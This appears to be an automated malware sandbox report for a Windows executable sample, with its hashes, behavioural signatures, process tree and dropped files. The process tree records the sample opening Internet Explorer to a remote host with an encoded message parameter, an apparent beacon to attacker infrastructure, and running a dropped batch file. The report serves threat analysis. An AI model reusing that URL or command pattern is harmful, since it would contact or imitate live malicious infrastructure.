Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    135s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2024, 09:38

General

  • Target

    c074e4ed3c8c3c1cdd3b12b63bb6f6a2_JaffaCakes118.exe

  • Size

    158KB

  • MD5

    c074e4ed3c8c3c1cdd3b12b63bb6f6a2

  • SHA1

    7e6c8d1b89677a0939d6d368d616631a62b877d3

  • SHA256

    9d256b7f879843ceb9f60c2e1e1f80fead34d193df640189dea485b5cc11778d

  • SHA512

    7bddfc809841f8d9de5b8c2e6afd14f3b63cdad181ed2428c82a64cf38bdd7540e265996d469333a272665bd1f439d1da34883e4ef27dbb916c151ae44f4d2ec

  • SSDEEP

    3072:fwABjrG3Vi/cOBLUsmyi4AHhmTdI3wIe0HRDLVT/sOrVzzXk:oGjrUVecOJUsmdmdI3vPRDLp/s0z0

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c074e4ed3c8c3c1cdd3b12b63bb6f6a2_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\c074e4ed3c8c3c1cdd3b12b63bb6f6a2_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\e74e030007299e6a6cc74f11e6f8dd1e.bat
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1528
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://wl.cabolar.com/v3062/repins.jpg?msg=HFCgfXDDXf8VvCheNRb4ldnLiTXO5GFaj6NQ3iSljgrvkaLJrSHnBnthvH85a0t8KQXFlwWYygiWoLv0lFOULIVi9Y13PAYGnThepuGu%2BiXrwTCMSuyeFnGDpw3V5fMw
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4944
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4944 CREDAT:17410 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4196

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    471B

    MD5

    e0bb119b734bd28ccbf31009397367f5

    SHA1

    54b097cc98bfe23500e25603d088a6b3eee7c97a

    SHA256

    05dc8c8c93f13fcc388a93f5cf37bc6b3ce00112b91204a8349f6e5c739f3036

    SHA512

    37648d6d957b5ae64cc5a459d144ca693b63a83885b19221c153b0aba0bd7aff392ca75b375bd2d7a7f8be02de0bba804e50f3afd95e73a4357089cc32aba147

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    404B

    MD5

    66fbe2294365a268c5a3013c078156c2

    SHA1

    836d9a0b23953e78d19ac4ff66e1292baf2a0044

    SHA256

    5add961f26adad7894ca9aaab13329f9dc454609cbb18f572d4fbfada59d80a0

    SHA512

    c4c945e621a8c1809ba753f26ef8d46a2d98c5915be0f77f4f45b9f23e2d40a64ed8af383dc53f9a4f107974c69333e3ac41dabc683f43e12bf376de7450140c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KDOTUZKP\suggestions[1].en-US

    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • C:\Users\Admin\AppData\Local\Temp\e74e030007299e6a6cc74f11e6f8dd1e.bat

    Filesize

    209B

    MD5

    9e5d95423696f1474083ae05b2ed1fd8

    SHA1

    f63db69c6adcc0cbc5aea5ea7a951a7e905b95a0

    SHA256

    1ff40fc7d7d004239f5777c4da227a08f35e46b340da09c6d713ad135fc8b91d

    SHA512

    bf706b153fcaf9478b873dc74b9acbbbd83e581638c9d99c69c0a029fe9f34af066370eccaf3d90b611da41f6e078735428d61ee7c31bfd5ec0610f821e82f19

  • memory/1792-0-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

  • memory/1792-11-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB